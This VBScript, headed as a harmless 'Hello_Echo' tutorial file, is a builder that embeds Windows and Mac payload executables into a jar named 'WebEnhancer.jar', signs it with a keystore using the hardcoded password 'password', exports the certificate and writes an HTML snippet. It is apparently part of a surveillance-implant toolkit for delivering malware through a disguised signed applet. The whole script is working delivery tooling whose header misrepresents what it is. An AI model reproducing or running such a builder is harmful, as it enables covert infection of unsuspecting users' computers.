' Hello_Echo.vbs ' Copyright (c) 2008 by Dr. Herong Yang, http://www.herongyang.com/ Set oArgs = WScript.Arguments If oArgs.Length < 3 Then WScript.Echo "No arguments provided!" WScript.Echo "Usage: makeapplet " WScript.Quit 1 End If Payload = WScript.Arguments.Item(0) TmpDir = WScript.Arguments.Item(1) OutputName = WScript.Arguments.Item(2) WScript.Echo "Selected payload : " & Payload WScript.Echo "Using temporary directory : " & TmpDir WScript.Echo "Output name : " & OutputName KeyStore = "applet.keystore" KeyStorePassword = "password" KeyAlias = "AppletCert" KeyPassword = "password" WScript.Echo ' Check that temporary directory exists Set objFSO = CreateObject("Scripting.FileSystemObject") If not objFSO.FolderExists (TmpDir) then WScript.Echo "Cannot find temporary directory " & TmpDir WScript.Quit 1 End If ' switch current directory to temporary Set WshShell = CreateObject("WScript.Shell") WshShell.CurrentDirectory = TmpDir SignedApplet = OutputName & ".jar" AppletCertificate = OutputName & ".cer" PayloadWin = Payload & ".exe" PayloadMac = Payload JarFile = "WebEnhancer.jar" ' delete any signed applet with the same name, if exists If objFSO.FileExists(SignedApplet) then objFSO.DeleteFile(SignedApplet) End If If not objFSO.FileExists(JarFile) then WScript.Echo "Cannot find the base JAR file " & JarFile WScript.Quit 1 End If If not objFSO.FileExists(PayloadWin) then WScript.Echo "Cannot find Windows payload file " & PayloadWin WScript.Quit 1 End If If not objFSO.FileExists(PayloadMac) then WScript.Echo "Cannot find Mac payload file " & PayloadWin WScript.Quit 1 End If objFSO.CopyFile PayloadWin, "win" objFSO.CopyFile PayloadMac, "mac" WScript.Echo "Adding payload to jar file." WScript.Echo "Embedding Windows payload." Ret = WshShell.Run("zip -u " & JarFile & " win", 0, true) WScript.Echo "Embedding Mac payload." Ret = WshShell.Run("zip -u " & JarFile & " mac", 0, true) WScript.Echo "Signing applet." Ret = WshShell.Run("jarsigner -keystore %RCSDB_PATH%\\res\\cert\\" & KeyStore & " -storepass " & KeyStorePassword & " -keypass " & KeyPassword & " -signedjar " & SignedApplet & " " & JarFile & " " & KeyAlias, 0, true) If not objFSO.FileExists(SignedApplet) then WScript.Echo "Cannot find " & SignedApplet WScript.Quit 1 End If WScript.Echo "Exporting certificate." Ret = WshShell.Run("keytool -export -keystore %RCSDB_PATH%\\res\\cert\\" & KeyStore & " -storepass " & KeyStorePassword & " -alias " & KeyAlias & " -file " & AppletCertificate, 0, true) If not objFSO.FileExists(AppletCertificate) then WScript.Echo "Cannot find " & AppletCertificate WScript.Quit 1 End If WScript.Echo "Creating HTML snippet." Set objFile = objFSO.CreateTextFile(OutputName & ".html") objFile.WriteLine("") WScript.Echo WScript.Echo "Done." .